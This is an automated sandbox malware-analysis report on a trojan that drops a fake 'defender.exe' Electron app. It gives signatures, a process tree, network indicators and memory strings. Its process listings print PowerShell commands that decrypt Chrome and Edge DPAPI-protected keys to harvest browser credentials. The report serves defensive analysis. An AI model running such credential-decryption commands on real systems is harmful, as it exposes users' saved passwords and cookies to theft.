Windows Analysis Report
SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe

Overview

General Information

Sample name:SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
Analysis ID:1487580
MD5:a4590450863f13aa67198ec0fe52453e
SHA1:7bc926cf52aa4c390cb7d6ac5756a9b95f6e8fb2
SHA256:d5628dd0e0710c14d9241a3eb0871dfa4fccf0888f6503d8b9a794cb5e8e6d71
Tags:exe

Detection

Score:60
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Icon mismatch, binary includes an icon from a different legit application in order to fool users
AI detected suspicious sample
Drops large PE files
Tries to harvest and steal browser information (history, passwords, etc)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries keyboard layouts
Queries the volume information (name, serial number etc) of a device
Sigma detected: Use Short Name Path in Command Line
Steals Internet Explorer cookies
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe (PID: 4540 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe" MD5: A4590450863F13AA67198EC0FE52453E)
    • defender.exe (PID: 1660 cmdline: C:\Users\user~1\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe MD5: 050F6E0968C055E912AB6CA8DC12A881)
      • cmd.exe (PID: 2324 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 2508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 2348 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 6244 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5876 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 6204 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 6176 cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,235,192,55,8,18,94,90,72,184,164,229,15,115,193,217,43,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,184,143,231,151,3,164,155,252,199,5,180,234,105,60,58,208,131,221,113,254,201,212,101,30,157,201,120,66,49,155,81,94,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,173,81,165,103,189,238,23,248,169,143,199,131,217,35,105,8,51,181,214,59,46,122,49,169,137,191,37,150,80,49,185,106,48,0,0,0,227,139,161,48,25,1,188,206,13,98,179,209,192,72,44,5,18,32,19,98,83,88,171,61,245,160,191,68,245,147,93,58,123,23,22,100,2,113,63,61,199,163,161,49,20,0,140,172,64,0,0,0,90,215,150,92,233,132,172,0,218,254,112,142,82,73,108,164,141,2,37,168,239,176,249,140,163,197,218,17,138,244,133,244,159,52,96,225,196,138,64,250,229,2,196,46,182,11,157,172,93,116,47,87,27,148,67,58,76,10,131,216,69,102,175,138), $null, 'CurrentUser')" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 2848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 4116 cmdline: powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,235,192,55,8,18,94,90,72,184,164,229,15,115,193,217,43,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,184,143,231,151,3,164,155,252,199,5,180,234,105,60,58,208,131,221,113,254,201,212,101,30,157,201,120,66,49,155,81,94,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,173,81,165,103,189,238,23,248,169,143,199,131,217,35,105,8,51,181,214,59,46,122,49,169,137,191,37,150,80,49,185,106,48,0,0,0,227,139,161,48,25,1,188,206,13,98,179,209,192,72,44,5,18,32,19,98,83,88,171,61,245,160,191,68,245,147,93,58,123,23,22,100,2,113,63,61,199,163,161,49,20,0,140,172,64,0,0,0,90,215,150,92,233,132,172,0,218,254,112,142,82,73,108,164,141,2,37,168,239,176,249,140,163,197,218,17,138,244,133,244,159,52,96,225,196,138,64,250,229,2,196,46,182,11,157,172,93,116,47,87,27,148,67,58,76,10,131,216,69,102,175,138), $null, 'CurrentUser') MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 516 cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,235,192,55,8,18,94,90,72,184,164,229,15,115,193,217,43,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,147,162,33,177,8,149,91,236,191,129,249,33,231,27,148,12,171,122,36,70,244,154,79,73,117,181,20,143,206,1,195,45,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,168,140,205,238,188,26,206,16,147,216,104,102,249,250,177,217,113,177,11,10,219,34,181,223,104,67,90,97,29,67,135,198,48,0,0,0,111,7,27,76,231,128,167,166,236,58,4,205,90,176,104,112,26,199,93,23,90,122,68,151,214,153,146,80,144,62,95,230,165,147,143,143,143,124,118,123,23,62,207,33,112,187,137,178,64,0,0,0,245,94,155,216,109,45,241,53,9,114,77,116,165,235,237,86,72,111,74,87,234,83,100,234,81,1,43,5,153,85,142,192,206,173,232,251,142,136,182,197,146,115,49,120,202,240,22,246,11,50,180,177,166,7,64,202,99,182,23,130,212,30,228,156), $null, 'CurrentUser')" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 2256 cmdline: powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,235,192,55,8,18,94,90,72,184,164,229,15,115,193,217,43,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,147,162,33,177,8,149,91,236,191,129,249,33,231,27,148,12,171,122,36,70,244,154,79,73,117,181,20,143,206,1,195,45,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,168,140,205,238,188,26,206,16,147,216,104,102,249,250,177,217,113,177,11,10,219,34,181,223,104,67,90,97,29,67,135,198,48,0,0,0,111,7,27,76,231,128,167,166,236,58,4,205,90,176,104,112,26,199,93,23,90,122,68,151,214,153,146,80,144,62,95,230,165,147,143,143,143,124,118,123,23,62,207,33,112,187,137,178,64,0,0,0,245,94,155,216,109,45,241,53,9,114,77,116,165,235,237,86,72,111,74,87,234,83,100,234,81,1,43,5,153,85,142,192,206,173,232,251,142,136,182,197,146,115,49,120,202,240,22,246,11,50,180,177,166,7,64,202,99,182,23,130,212,30,228,156), $null, 'CurrentUser') MD5: 04029E121A0CFA5991749937DD22A1D9)
      • defender.exe (PID: 5140 cmdline: "C:\Users\user~1\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\defender" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1832 --field-trial-handle=1804,i,2169737662434373633,7221801736705868447,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2 MD5: 050F6E0968C055E912AB6CA8DC12A881)
      • explorer.exe (PID: 4056 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
      • defender.exe (PID: 5484 cmdline: "C:\Users\user~1\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\defender" --mojo-platform-channel-handle=2132 --field-trial-handle=1804,i,2169737662434373633,7221801736705868447,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8 MD5: 050F6E0968C055E912AB6CA8DC12A881)
      • defender.exe (PID: 2324 cmdline: "C:\Users\user~1\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe" --type=renderer --user-data-dir="C:\Users\user\AppData\Roaming\defender" --app-path="C:\Users\user~1\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\resources\app.asar" --no-sandbox --no-zygote --first-renderer-process --lang=en-GB --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=4 --time-ticks-at-unix-epoch=-1722781275767759 --launch-time-ticks=4443586976 --mojo-platform-channel-handle=2360 --field-trial-handle=1804,i,2169737662434373633,7221801736705868447,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:1 MD5: 050F6E0968C055E912AB6CA8DC12A881)
  • cleanup
No configs have been found
No yara matches

System Summary

Source: Process started; Author: frack113, Nasreddine Bencherchali; Data: Command: C:\Users\user~1\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe, CommandLine: C:\Users\user~1\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe, ParentProcessId: 4540, ParentProcessName: SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe, ProcessCommandLine: C:\Users\user~1\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe, ProcessId: 1660, ProcessName: defender.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,235,192,55,8,18,94,90,72,184,164,229,15,115,193,217,43,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,184,143,231,151,3,164,155,252,199,5,180,234,105,60,58,208,131,221,113,254,201,212,101,30,157,201,120,66,49,155,81,94,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,173,81,165,103,189,238,23,248,169,143,199,131,217,35,105,8,51,181,214,59,46,122,49,169,137,191,37,150,80,49,185,106,48,0,0,0,227,139,161,48,25,1,188,206,13,98,179,209,192,72,44,5,18,32,19,98,83,88,171,61,245,160,191,68,245,147,93,58,123,23,22,100,2,113,63,61,199,163,161,49,20,0,140,172,64,0,0,0,90,215,150,92,233,132,172,0,218,254,112,142,82,73,108,164,141,2,37,168,239,176,249,140,163,197,218,17,138,244,133,244,159,52,96,225,196,138,64,250,229,2,196,46,182,11,157,172,93,116,47,87,27,148,67,58,76,10,131,216,69,102,175,138), $null, 'CurrentUser'), CommandLine: powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,235,192,55,8,18,94,90,72,184,164,229,15,115,193,217,43,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,184,143,231,151,3,164,155,252,199,5,180,234,105,60,58,208,131,221,113,254,201,212,101,30,157,201,120,66,49,155,81,94,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,173,81,165,103,189,238,23,248,169,143,199,131,217,35,105,8,51,181,214,59,46,122,49,169,137,191,37,150,80,49,185,106,48,0,0,0,227,139,161,48,25,1,188,206,13,98,179,209,192,72,44,5,18,32,19,98,83,88,171,61,245,160,191,68,245,147,93,58,123,23,22,100,2,113,63,61,199,163,161,49,20,0,140,172,64,0,0,0,90,215,150,92,233,132,172,0,218,254,112,142,82,73,108,164,141,2,37,168,239,176,249,140,163,197,218,17,138,244,133,244,159,52,96,225,196,138,64,250,229,2,196,46,182,11,157,172,93,116,47,87,27,148,67,58,76,10,131,216,69,102,175,138), $null, 'CurrentUser'), CommandLine|base64offset|contains: ~O*^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,235,192,55,8,18,94,90,72,184,164,229,15,115,193,217,43,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,184,143,231,151,3,164,155,252,199,5,180,234,105,60,58,208,131,221,113,254,201,212,101,30,157,201,120,66,49,155,81,94,0,0,0,0
No Snort rule has matched

AV Detection

Source: Submitted Sample; Integrated Neural Analysis Model: Matched 93.2% probability
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Code function: 23_2_00007FFAAB7D4B42 CryptUnprotectData,23_2_00007FFAAB7D4B42
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Code function: 23_2_00007FFAAB7D4FEE CryptUnprotectData,23_2_00007FFAAB7D4FEE
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Code function: 26_2_00007FFAAB894FEE CryptUnprotectData,26_2_00007FFAAB894FEE
Source: SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe; Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe; File created: C:\Users\user~1\AppData\Local\Temp\nsrF83A.tmp\7z-out\LICENSE.electron.txt
Source: C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe; File created: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\LICENSE.electron.txt
Source: SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe; Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Dev\elevate\bin\x86\Release\Elevate.pdb source: elevate.exe.0.dr
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe; File opened: C:\Users\user~1\AppData
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe; File opened: C:\Users\user~1\AppData\Local
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe; File opened: C:\Users\user~1\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe; File opened: C:\Users\user~1\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\resources
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe; File opened: C:\Users\user~1\AppData\Local\Temp
Source: C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe; File opened: C:\Users\user~1
Source: Joe Sandbox View; IP Address: 162.159.61.3
Source: Joe Sandbox View; IP Address: 172.64.41.3
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1 (reported 9 times)
Source: global traffic; DNS traffic detected: DNS query: www.setekshome.com
Source: global traffic; DNS traffic detected: DNS query: ws-eu.pusher.com
Source: global traffic; DNS traffic detected: DNS query: sockjs-eu.pusher.com
Source: global traffic; DNS traffic detected: DNS query: chrome.cloudflare-dns.com
Source: global traffic; DNS traffic detected: DNS query: stats.pusher.com
Source: unknown; HTTP traffic detected: POST /dns-query HTTP/1.1 | Host: chrome.cloudflare-dns.com | Connection: keep-alive | Content-Length: 128 | Accept: application/dns-message | Accept-Language: * | User-Agent: Chrome | Accept-Encoding: identity | Content-Type: application/dns-message
Source: explorer.exe, 0000001D.00000000.1774067541.0000000007306000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1776329895.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: explorer.exe, 0000001D.00000000.1774067541.0000000007306000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1776329895.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: explorer.exe, 0000001D.00000000.1774067541.0000000007306000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1776329895.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: elevate.exe.0.dr; String found in binary or memory: http://int3.de/
Source: SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe; String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000017.00000002.1646408112.0000023AB1531000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1646408112.0000023AB13EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1612107420.0000023AA2CC6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1743397396.0000019ADD86E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1743397396.0000019ADD9B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1675946104.0000019ACF142000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://nuget.org/NuGet.exe
Source: explorer.exe, 0000001D.00000000.1774067541.0000000007306000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1776329895.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 0000001D.00000000.1774067541.00000000071FC000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: powershell.exe, 0000001A.00000002.1675946104.0000019ACF0BB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1675946104.0000019ACEF0A000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: explorer.exe, 0000001D.00000000.1779503148.000000000C091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1775864991.0000000008820000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001D.00000000.1775178622.0000000007C70000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001D.00000000.1775842222.0000000008810000.00000002.00000001.00040000.00000000.sdmp; String found in binary or memory: http://schemas.micro
Source: explorer.exe, 0000001D.00000000.1779503148.000000000C091000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: http://schemas.microsoft.
Source: powershell.exe, 00000017.00000002.1612107420.0000023AA1381000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1675946104.0000019ACD801000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000017.00000002.1612107420.0000023AA253C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1675946104.0000019ACEF0A000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 0000001A.00000002.1675946104.0000019ACF0BB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1675946104.0000019ACEF0A000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: explorer.exe, 0000001D.00000000.1779503148.000000000C400000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 0000001D.00000000.1774067541.00000000071A4000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: http://www.foreca.com
Source: explorer.exe, 0000001D.00000000.1776329895.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp
Source: powershell.exe, 00000017.00000002.1612107420.0000023AA1381000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1675946104.0000019ACD801000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://aka.ms/pscore68
Source: defender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp; String found in binary or memory: https://alekberg.net/privacy
Source: defender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp; String found in binary or memory: https://alekberg.net/privacyalekberg.net
Source: explorer.exe, 0000001D.00000000.1776329895.000000000913F000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 0000001D.00000000.1776329895.0000000008F09000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 0000001D.00000000.1776329895.0000000008DA6000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 0000001D.00000000.1776329895.0000000008F09000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
Source: explorer.exe, 0000001D.00000000.1774067541.00000000071FC000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=DD4083B70FE54739AB05D6BBA3484042&timeOut=5000&oc
Source: explorer.exe, 0000001D.00000000.1774067541.00000000071FC000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 0000001D.00000000.1774067541.0000000007276000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?t
Source: explorer.exe, 0000001D.00000000.1776329895.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: https://arc.msn.com
Source: explorer.exe, 0000001D.00000000.1774067541.00000000071FC000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
Source: explorer.exe, 0000001D.00000000.1774067541.00000000071FC000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg
Source: explorer.exe, 0000001D.00000000.1774067541.00000000071FC000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
Source: explorer.exe, 0000001D.00000000.1774067541.00000000071FC000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
Source: explorer.exe, 0000001D.00000000.1774067541.00000000071FC000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT
Source: explorer.exe, 0000001D.00000000.1774067541.00000000071FC000.00000004.00000001.00020000.00000000.sdmp; String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-dark
Source: defender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp; String found in binary or memory: https://chrome-devtools-frontend.appspot.com/
Source: defender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp; String found in binary or memory: https://chrome-devtools-frontend.appspot.com/%s%s/%s/NetworkResourceLoaderstreamWriteInspectableWebC
Source: defender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp; String found in binary or memory: https://chrome.cloudflare-dns.com/dns-query
Source: defender.exe, 0000000C.00000000.1547993492.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp, defender.exe, 0000001C.00000000.1783866616.00007FF7F56C2000.00000002.00000001.01000000.00000009.sdmp; String found in binary or memory: https://chrome.cloudflare-dns.com/dns-queryone.one.one.one1dot1dot1dot1.cloudflare-dns.com1.1.1.11.0
Source: zh-CN.pak.0.dr, fr.pak.0.dr; String found in binary or memory: https://chrome.google.com/webstore/category/extensions
Source: fr.pak.0.dr; String found in binary or memory: https://chrome.google.com/webstore?hl=fr&category=theme81https://myactivity.google.com/myactivity/?u
Source: fr.pak.0.dr; String found in binary or memory: https://chrome.google.com/webstore?hl=frRaccourci
Source: zh-CN.pak.0.dr; String found in binary or memory: https://chrome.google.com/webstore?hl=zh-CN
Source: zh-CN.pak.0.dr; String found in binary or memory: https://chrome.google.com/webstore?hl=zh-CN&category=theme81https://myactivity.google.com/myactivity
Source: zh-CN.pak.0.dr, fr.pak.0.dr; String found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherEnabled
Source: zh-CN.pak.0.dr, fr.pak.0.dr; String found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherExternalGreylistUrl
Source: zh-CN.pak.0.dr, fr.pak.0.dr; String found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherExternalSitelistUrl
Source: zh-CN.pak.0.dr, fr.pak.0.dr; String found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherUrlGreylist
Source: zh-CN.pak.0.dr, fr.pak.0.dr; String found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherUrlList
Source: zh-CN.pak.0.dr, fr.pak.0.dr; String found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherUseIeSitelist
